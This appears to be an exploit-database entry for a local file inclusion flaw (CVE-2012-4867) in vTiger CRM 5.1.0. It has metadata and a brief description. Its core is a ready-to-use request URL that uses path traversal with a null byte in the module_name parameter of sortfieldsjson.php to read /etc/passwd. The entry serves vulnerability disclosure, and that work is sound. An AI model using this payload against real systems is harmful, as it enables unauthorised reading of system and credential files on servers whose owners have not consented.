vTiger CRM 5.1.0 - Local File Inclusion

Author: Pi3rrot
type: webapps
platform: php
port: 
date_added: 2012-04-22  
date_updated: 2017-10-04  
verified: 1  
codes: OSVDB-80552;CVE-2012-4867  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 18770.txt  

# Exploit Title: VTiger CRM
# Google Dork: None
# Date: 20/03/2012
# Author: Pi3rrot
# Software Link: http://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%205.1.0/
# Version: 5.1.0
# Tested on: CentOS 6
# CVE : none

We have find this vulnerabilitie in VTiger 5.1.0
In this example, you can see a Local file Inclusion in the file sortfieldsjson.php

Try this :
https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00